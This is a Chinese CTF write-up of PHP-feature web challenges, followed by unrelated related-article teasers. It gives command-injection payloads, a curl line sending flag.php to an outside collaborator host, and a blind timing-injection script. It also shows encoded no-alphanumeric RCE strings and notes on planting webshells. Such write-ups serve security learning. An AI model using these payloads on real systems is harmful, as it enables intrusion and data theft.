ctf_show笔记篇(web入门---php特性)

目录

 php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

91:这里需要细节一点

92-93:这两题的方法很多可以发散思维

94:还是利用小数绕过例如4476.0

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

98:php三元运算符

99:in_array函数漏洞

100:没有设置什么过滤直接命令执行就好###101题的弱化版

101:ReflectionClass 建立反射类

102:还是写一句话木马进服务器

113:和102同理只是把php改为

114:随便上传两个相同的字符

105:考察变量覆盖

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

​编辑

108:简单绕过

109:这里学到了利用反序列化的__construct魔法函数来利用

110:php的内置函数FilesystemIterator的利用

111:直接利用php的全局变量

112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

115:

123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

127:利用php的特性绕过

128:新知识点

129:stripos(1,2)查找2在1中第一次出现的位置

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

132:关于php的逻辑运算符

133:利用变量覆盖再利用curl可以传输文件信息

134:$_POST是个幌子

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

137:call_user_func()函数调用方法

138:相当于禁用了::

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

140:让传入的两个函数运行后是0或者false或空

141:利用php计算来绕过return

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

146:'|','^'同样也可以当作运算符用来绕过return

147:涉及两个知识点create_function的代码注入以及php命令空间

148:异或绕过即可或者非预期

149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上


 php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

payload:

num=4476%0a

4476%0a不绝对等于4476应为%0a相当于是空格

但是intval(4476%0a,0)这里intval函数用于获取变量的整数值,所以会排除掉%0a所以

intval(4476%0a,0)===4476

intval(a,b)

如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的

91:这里需要细节一点

/m会多行匹配意思就是

a

php

这样也能匹配到

而这里就只能匹配第一行所以能绕过

92-93:这两题的方法很多可以发散思维

  1. 利用intval可以计算其他进制来绕过,例如使用八进制   payload:010574
  2. 或者利用intval取整的特性4476.1####92题不行
  3. 92题可以使用16进制绕过

94:还是利用小数绕过例如4476.0

这里不知道为什么4476.0可以但是4476.1或者4476.2其他的数字不行

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

payload:

%0a010574

96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL

解法2:利用明文不同但是hashi值相同的两个字符串

98:php三元运算符

三元运算符就是php的if函数的变式:

例如:$a = $b == 3?4:5;   等同于if($b == 3){$a = 4}else{$a == 5}

$_GET?$_GET=&$_POST:'flag';

等于if($_GET){$_GET=&$_POST}else{'flag'}

解析:当通过get方式传入参数时就把get传入参数改为post传入参数

$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';

因为已经表名了当通get传参直接变成POST传参所以这里应该变为

if($_POST['flag']=='flag'){$_POST=&$_COOKIE}else{'flag'}

解析:只要有通过post传输参数flag=flag,那么POST传入参数改为COOKIE传入参数

$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';

还是同理,因为了通过post传输参数flag=flag直接变成COOKIE传参所以这里应该变为

if($_COOKIE['flag']=='flag'){$_COOKIE=&_SERVER}else{'flag'}

解析:只要有通过COOKIE传输参数flag=flag,那么COOKIE传入参数改为SERVER传入参数

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

最后这里

highlight_file(if($_SERVER['HTTP_FLAG']=='flag'){$flag}else{__FILE__})

所以最后payload:

  1. ?a=1               ####随便传入一个get引用第一个方法将$_GET传参改为$_POST
  2. post传参:flag=flag       ####将$_POST传参改为$_COOKIE
  3. Cookie: flag=flag         ####将$_COOKIE传参改为$_SERVER
  4. Flag: flag          ####获取到flag

99:in_array函数漏洞

当type参数没有设置的话他不会检查数据和数组的类型是否相同

例如:

in_array(1.abc,1),一个是字符串一个是数组,但是没有设置第三个参数,就可以形成自动转换,1.abc自动转换为1

100:没有设置什么过滤直接命令执行就好###101题的弱化版

payload1:

?v1=21&v2=var_dump($ctfshow)/*&v3=*/;

payload2:

?v1=1&v2=system('ls')/*&v3=*/;

payload3:

?v1=1&v2=cp ctfshow.php 1.txt/*&v3=*/;    ####访问1.txt就可以访问

101:ReflectionClass 建立反射类

从提示可知少给了一位flag,拿到bp爆破就好

102:还是写一句话木马进服务器

substr(a,b)函数是一个截取函数,a是需要被截取的字符串,b是需要从第几位开始截取###从零开始数

call_user_func函数类似于一种特别的调用函数的方法

file_put_contents函数是一个写入字符串进文件的函数,也可以通过此函数创建文件并写入东西

构造payload:

113:和102同理只是把php改为<?=就好,这个等同于<?php echo

114:随便上传两个相同的字符

105:考察变量覆盖

foreach函数:通过get传入?a=b那么通过foreach函数使$key=a而$value=b

$$key=$$value,这里的意思就是把原本的值当作变量名用了

这里的就相当于是$$key=$$value    <>    $a=$b

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

这里会通过parse_str把$v1的值给$v2有点像赋值

给v1传入flag=1,赋值以后,$v2=([flag] => 1)

108:简单绕过

ereg(a,b)类似于搜索,a是条件类似于正则,b使字符串如果b中有a的要求的东西则输出真

ereg函数存在NULL截断漏洞,导致了正则过滤被绕过

strrev()是取反函数传入abc返回cba这种

109:这里学到了利用反序列化的__construct魔法函数来利用

__cddonstruct魔法函数当使用new实例化一个对象的时候就会引用

payload:

v1=

class{

    public function __construct(){

        system('ls')

    }

}

v2=1

连起来就是echo new (class{public function __construct(){system('ls')}}1())

110:php的内置函数FilesystemIterator的利用

FilesystemIterator()可以读取指定的目录文件

fetcwd()可以获取当前目录的路径

111:直接利用php的全局变量

112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

解答1:

/proc/self/root表示根目录

利用这个多次添加让is_file函数认为这不是个文件

解答2:

php中的zip伪协议

官方用法compress.zlib://file.gz         compress.zlib://file.bz2

115:

trim()函数用于移除字符串两侧的空格

这里利用%0c绕过相当于是<,并且并不会被trim过滤掉,并且输入的参数还是int型

123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

$_SERVER['argv']:

传递给该脚本的参数的数组。脚本以命令行方式运行时,argv变量传递给程序C语言样式的命令行参数。当通过GET方式调用时,该变量包含query string。

大致来说就是会把接收的数据变成数组,数据用分隔号隔开例如+之类的

payload:

get:$a=a+fl0g=flag_give_me

post=CTF_SHOW=2&CTF[SHOW.COM=1&fun=parse_str($a[1])

这里通过$_SERVER['argv']给$a指定了他的方式

第一个参数$_SERVER['argv'][0]是脚本名,其余的是传递给脚本的参数(例如这样的$a[1])

parse_str函数:

127:利用php的特性绕过

$_SERVER['QUERY_STRING']获取 URL 数据并使用 PHP 中的 Explode 函数将数据转换为数组

128:新知识点

_()==gettext() 是gettext()的拓展函数,开启text扩展。需要php扩展目录下有php_gettext.dll

get_defined_vars — 返回由所有已定义变量所组成的数组 这样可以获得 $flag

129:stripos(1,2)查找2在1中第一次出现的位置

利用目录穿越例如/ctfshow/../../../etc/passwd

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

当存在这样的情况时可能会出现正则溢出的情况

例如:

原字符:abcd                正则:.*?d

这里的.*?会率先匹配第一个字符a但是他选择先不匹配,因为是非贪婪模式(在可以匹配和不匹配之间优先选择不匹配),这里会把选择权给d,d回去匹配下一个字符b,如果不匹配选择权又会回到.*?去匹配b,但是还是因为非贪婪模式,不回去直接匹配,又把选择权给d,直到匹配到最后一个字符d才会停下

import requests

url = r'http://a3835817-be92-4fb2-ba94-2db402037f5a.challenge.ctf.show/'

data = {
    'f': 'aaaaaaaa'*130000+'36Dctfshow'
}

a = requests.post(url=url, data=data)
print(a.text)

132:关于php的逻辑运算符

对于“与”(&&) 运算: x && y 当xfalse时,直接跳过,不执行y
对于“或”(||) 运算 :   x||y 当xtrue时,直接跳过,不执行y

133:利用变量覆盖再利用curl可以传输文件信息

payload:`$F`;+curl -X POST -F a=flag.php https://lj8u9k8tr39ry1cpwrqhz7ndd4jx7nvc.oastify.com

134:$_POST是个幌子

$_SERVER['QUERY_STRING']:

这里会获取url里?后面的数据

parse_str():

将这样的a=1&b=2给附上值,变成$a=1  $b=2

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

例如:cat flag.php|tee 1       看flag.php文件又能输出到文件1里

137:call_user_func()函数调用方法

调用类里的方法时

array("a","b")   <==>   a::b

138:相当于禁用了::

但是call_user_func(array("a","b"))使用array创建数组调用类里面的方法

所以传输的时候可以使用变式,直接传数组

例如:a[0]=a     a[1]=b       这样和使用array来创建数组是相同的

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

ls / -1  自动换行     awk  "NR==1"  取第一排      cut -c 1  取第一个

if [ a == b ];then echo 123;fi     if的[]里必须有间隔不然会报错,如果a等于b执行then echo 123,错误则执行fi

import requests

url = r"http://16c540da-b9a6-4523-bccd-019f974cb794.challenge.ctf.show/?c="
flag1 = "qwertyuiopasdfghjklzxcvbnm_-=+[]{};\':\",./<>?123456789."
flag = ""

for i in range(1, 6):
    for a in range(1, 32):
        for b in flag1:
            payload = f"if [ `ls / -1|awk \"NR=={i}\"|cut -c {a}` == \"{b}\" ];then sleep 4;fi"
            try:
                requests.get(url=url+payload, timeout=3)
            except:
                flag += b
                print(flag)
                break

140:让传入的两个函数运行后是0或者false或空

141:利用php计算来绕过return

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

/^\W+$/ 作用是匹配非数字字母下划线的字符

可使用取反来绕过

<?php

echo urlencode(~'system');
echo '  ';
echo urlencode(~'\'ls\''

1-phpinfo()-1  =  2       return在输出计算结果的同时,也会把phpinfo()的结果输出

payload:v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8)-

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

只是把v2和v3换了个位置,给v2赋值‘-’

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

1?a:b

等同于

if 1{

a;

}else{

b;

}

payload:

(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%d5)

system  cat f*

146:'|','^'同样也可以当作运算符用来绕过return

147:涉及两个知识点create_function的代码注入以及php命令空间

create_function的代码注入###本函数已自 PHP 7.2.0 起被废弃,并自 PHP 8.0.0 起被移除

此函数在内部执行  eval(),因此具有跟  eval() 相同的安全问题,就是因为他创建匿名函数的同时会内部执行eval,就会直接将里面的参数全部执行了

​​​例如:
create_function(a,b)
等同于
function xxx(a){
b
}
php命令空间
在PHP中普通的调用函数方式相当于是调用的相对路径,例如调用create_function,其实是调用的\create_function此路径的函数,在php中可以自定义命名空间,但是最基本的命名空间就是调用\下面的函数

148:异或绕过即可或者预期解

149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

日志文件包含:

这里需要vip这个变量等于1  isvip函数才会返回true才能最后利用到这里的include函数

if($isVIP && strrpos($ctf, ":")===FALSE){
    include($ctf);
}
而要让isVIP这个变量赋值为1,需要利用到extract函数####这里134题也讲过

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上

class_exists检查类是否被定义

__autoload — 尝试加载未定义的类会被调用

利用extract(..CTFSHOW..);来覆盖$__CTFSHOW__

####关于符号  ' . '  这个在之前做过解释,在php里,变量如果使用特殊字符如'['和'.'还有空格这一类的,会自动被加载为_

这里似乎被删减过,只要找到phpinfo就能获得flag

最后payload:?..CTFSHOW..=phpinfo

但是这里还是要对这个条件竞争做一个笔记

这里是vuhub上做出的解释

##不理解为什么会出现临时文件可以去看这篇无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

大致来讲就是,通过post传入参数时同时上传的文件会被服务器存为临时文件,但在每次执行完命令之后就会立马删除,必须要在它没删除之前访问它才能让他保留,但这种情况几乎不存在,所以需要卡bug,通过phpinfo页面来增加他执行完成的时间,上面有原理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/424415.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

mysql根据指定顺序返回数据--order by field

在查询数据的时候&#xff0c;在in查询的时候&#xff0c;想返回的数据根据 in里的数据顺序返回&#xff0c;可以直接在orderby中通过 FIELD(字段名称逗号分隔的值的顺序) 进行指定&#xff1b;示例没有加 order by field添加 order by field效果

宝塔面板安装各种组件以及部署应用服务

在linux服务器安装宝塔面板 一、从宝塔官网下载exe安装包&#xff0c;安装命令从宝塔官网&#xff08;https://www.bt.cn/&#xff09;获取 yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh二、安…

C++复习笔记——多态

1 多态 基本概念&#xff1a; 静态多态&#xff1a;编译时多态&#xff0c;运算符重载和函数重载动态多态&#xff1a;运行时多态&#xff0c;派生类重写基类的虚函数实现 静态多态和动态多态的区别就是函数地址是早绑定(静态联编&#xff0c;静态绑定)还是晚绑定(动态联编&a…

使用pyannote-audio实现声纹分割聚类

使用pyannote-audio实现声纹分割聚类 # GitHub地址 https://github.com/MasonYyp/audio1 简单介绍 pyannote.audio是用Python编写的用于声纹分割聚类的开源工具包。在PyTorch机器学习基础上&#xff0c;不仅可以借助性能优越的预训练模型和管道实现声纹分割聚类&#xff0c;还…

一文了解docker与k8s

随着 k8s 作为容器编排解决方案变得越来越流行&#xff0c;有些人开始拿 Docker 和 k8s 进行对比&#xff0c;不禁问道&#xff1a;Docker 不香吗&#xff1f; k8s 是 kubernetes 的缩写&#xff0c;8 代表中间的八个字符。 其实 Docker 和 k8s 并非直接的竞争对手两者相互依存…

蜻蜓FM语音下载(mediadown)

一、介绍 蜻蜓FM语音下载&#xff08;mediadown&#xff09;&#xff0c;能够帮助你下载蜻蜓FM音频节目。如果你是蜻蜓FM会员&#xff0c;它还能帮你下载会员节目。 二、下载地址 本站下载&#xff1a;蜻蜓FM语音下载&#xff08;mediadown&#xff09; 百度网盘下载&#…

【JS】解构赋值注意点,解构赋值报错

报错代码 const 小明 { email: 6, pwd: 66 } const 小刚 { email: 9, pwd: 99 }const { email } 小明 const { email } 小刚 报错图 原因 2个常量重复&#xff0c;重复在同一个作用域内是不能重复的&#xff0c;例如大括号内{const a 1; const a 2} 小伙伴A提问 问&…

微信小程序云开发教程——墨刀原型工具入门(编辑页面)

引言 作为一个小白&#xff0c;小北要怎么在短时间内快速学会微信小程序原型设计&#xff1f; “时间紧&#xff0c;任务重”&#xff0c;这意味着学习时必须把握微信小程序原型设计中的重点、难点&#xff0c;而非面面俱到。 要在短时间内理解、掌握一个工具的使用&#xf…

探索Manticore Search:开源全文搜索引擎的强大功能

在当今信息爆炸的时代&#xff0c;数据的快速检索变得至关重要。无论是在电子商务网站、新闻门户还是企业内部文档&#xff0c;高效的搜索引擎都是确保用户满意度和工作效率的关键因素之一。而在搜索引擎领域&#xff0c;Manticore Search 作为一款开源的全文搜索引擎&#xff…

09 闭环线程 LoopClosing

文章目录 09 闭环线程 LoopClosing9.1 主函数&#xff1a;Run()9.1.1 闭环检测9.1.2 计算Sim3变换&#xff08;相似变换&#xff09;: ComputeSim3()9.1.4 闭环矫正: CorrectLoop() 09 闭环线程 LoopClosing 9.1 主函数&#xff1a;Run() 成员函数/变量访问控制意义CheckNewK…

第一篇【传奇开心果系列】Python的自动化办公库技术点案例示例:深度解读Pandas库

传奇开心果博文系列 系列博文目录Python的自动化办公库技术点案例示例系列 博文目录前言一、主要特点和功能介绍二、Series 示例代码三、DataFrame示例代码四、数据导入/导出示例代码五、数据清洗示例代码六、数据选择和过滤示例代码七、数据合并和连接示例代码八、数据分组和聚…

Numpy教程

文章目录 数组基础文件与字符串多项式分布实战 Numpy绝对可以说是支撑Python地位的最重要的包了&#xff0c;几乎所有能叫出名的Python计算库&#xff0c;都不可避免地调用了Numpy&#xff0c;Numpy官网也列出了一些&#xff0c;大致如下图这样&#xff0c;在科学计算领域&…

Hololens 2应用开发系列(1)——使用MRTK在Unity中设置混合现实场景并进行程序模拟

Hololens 2应用开发系列&#xff08;1&#xff09;——使用MRTK在Unity中进行程序模拟 一、前言二、创建和设置MR场景三、MRTK输入模拟的开启 一、前言 在前面的文章中&#xff0c;我介绍了Hololens 2开发环境搭建和项目生成部署等相关内容&#xff0c;使我们能生成一个简单Ho…

基于图数据库构建知识图谱平台应用实践

▏摘要 中信证券基于分布式图数据库StellarDB&#xff0c;替代国外开源图数据库产品&#xff0c;打造全新的企业级知识图谱平台&#xff0c;应用于同一客户集团画像、科创板关联发现、风险事件报告、全球企业关联图谱、产业链图谱、投研图谱、反洗钱与稽核图谱、元数据图谱等应…

提升工作能力的方法

1.接受工作&#xff0c;只问标准 2.请示工作&#xff0c;必带方案&#xff1b; 3.汇报工作&#xff0c;突出成果&#xff1b; 4.分享工作&#xff0c;细说流程&#xff1b; 5.复盘工作&#xff0c;总结SOP 如果能这么做&#xff0c;那将是一个非常通透的高手&#xff0c;所以高…

初探2b blender

总结 按照youtube 教程 做了个雏形 心得 从正面, 侧面 视图整体上调整外轮廓流线型趋向, 比如正面看这个发型像个鸡蛋的外轮廓头发重要的是丝滑, 流畅 集束 层次 交错

git的安装、使用

文章目录 安装gitgit学习网站git初始配置具体配置信息 新建版本库&#xff08;仓库&#xff09;git的工作区域和文件状态工作区域文件状态git文件提交的基础指令 git基础指令1. 版本提交2. 分支创建3. 分支切换4. 分支合并(1) git merge(2) git rebase 5. 在git的提交树上移动(…

国内哪个工具可以平替chatgpt?国内有哪些比较好用的大模型gpt?

我自己试用了很多的平台&#xff0c;发现三个比较好的大模型平台&#xff0c;对普通用户也比较的友好的&#xff0c;而且返回内容相对来说&#xff0c;正确率更高的&#xff0c;并且相关场景插件比较丰富的国内厂商。 本文说的&#xff0c;是我自己觉得的&#xff0c;比较有主观…

vue2结合electron开发桌面端应用

一、Electron是什么&#xff1f; Electron是一个使用 JavaScript、HTML 和 CSS 构建桌面应用程序的框架。 嵌入 Chromium 和 Node.js 到 二进制的 Electron 。允许您保持一个 JavaScript 代码代码库并创建可在Windows、macOS和Linux上运行的跨平台应用 。 Electron 经常与 Ch…

Python3零基础教程之数学运算专题初阶

大家好,我是千与编程,在上一节课程我们讲解了Python3基础课程中的变量与数据专题项目,本章节中涉及的Python3编程语言中的基础的四则运算、赋值运算符号,赋值运算符号,比较运算符号,位运算符号的计算方法。 这一章的内容算是比较基础的部分,最后需要学会使用即可。以下是…
最新文章